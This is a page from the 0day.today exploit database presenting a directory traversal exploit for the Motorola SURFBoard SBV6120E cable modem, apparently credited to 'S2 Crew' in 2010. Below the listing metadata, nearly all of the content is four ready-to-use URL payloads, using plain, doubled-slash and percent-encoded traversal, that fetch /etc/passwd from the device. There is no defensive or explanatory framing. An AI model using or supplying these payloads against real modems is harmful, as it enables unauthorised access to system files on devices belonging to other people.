[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Motorola SURFBoard Cable Modem Directory Traversal

Author
S2 Crew
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12539
Category
local exploits
Date add
03-06-2010
Platform
hardware
==================================================
Motorola SURFBoard Cable Modem Directory Traversal
==================================================


# Exploit Title: Motorola SURFBoard Cable Modem Directory Traversal
# Date: 2010.06.03
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: Model name: SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC
# Tested on: ^
# CVE: -
# Code :
 
The following urls get back the /etc/passwd file from the modem:
 
http://[IP]///etc/passwd <http://[ip]///etc/passwd>
http://[IP]/../../etc/passwd
 
http://[IP]/..%2f..%2fetc/passwd <http://[ip]/..%2f..%2fetc/passwd>
http://[IP]/%2e%2e/%2e%2e/etc/passwd



#  0day.today [2024-11-15]  #